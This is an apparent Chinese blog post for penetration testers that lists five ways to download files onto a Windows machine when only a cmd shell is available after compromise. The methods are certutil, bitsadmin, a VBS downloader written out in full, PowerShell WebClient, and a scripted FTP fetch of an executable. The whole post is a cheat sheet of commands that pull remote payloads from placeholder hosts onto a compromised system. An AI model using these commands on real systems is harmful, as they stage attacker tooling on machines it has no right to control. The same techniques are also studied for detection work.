在渗透中通常会遇到只有cmd shell的情况,在这种情况下,通常需要下载文件来进行后续渗透。这里记录了几种在cmd下不需要其他三方程序就可以直接下载文件的方法。
1.certutil
certutil -urlcache -split -f https://www.xxx.com/test.py
certutil -urlcache -split -f https://www.xxx.com/test.py ff.py #指定保存文件名
2.bitsadmin
bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg
3.vbs
#用echo写入
On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
cscript ff.vbs http://www.xxx.com/xx.jpg xx.jpg
4.powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xx.com/ff.jpg','c:\aaa.jpg')
5.ftp
echo open 8.8.8.8 >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt
ftp -A -s:a.txt
网友评论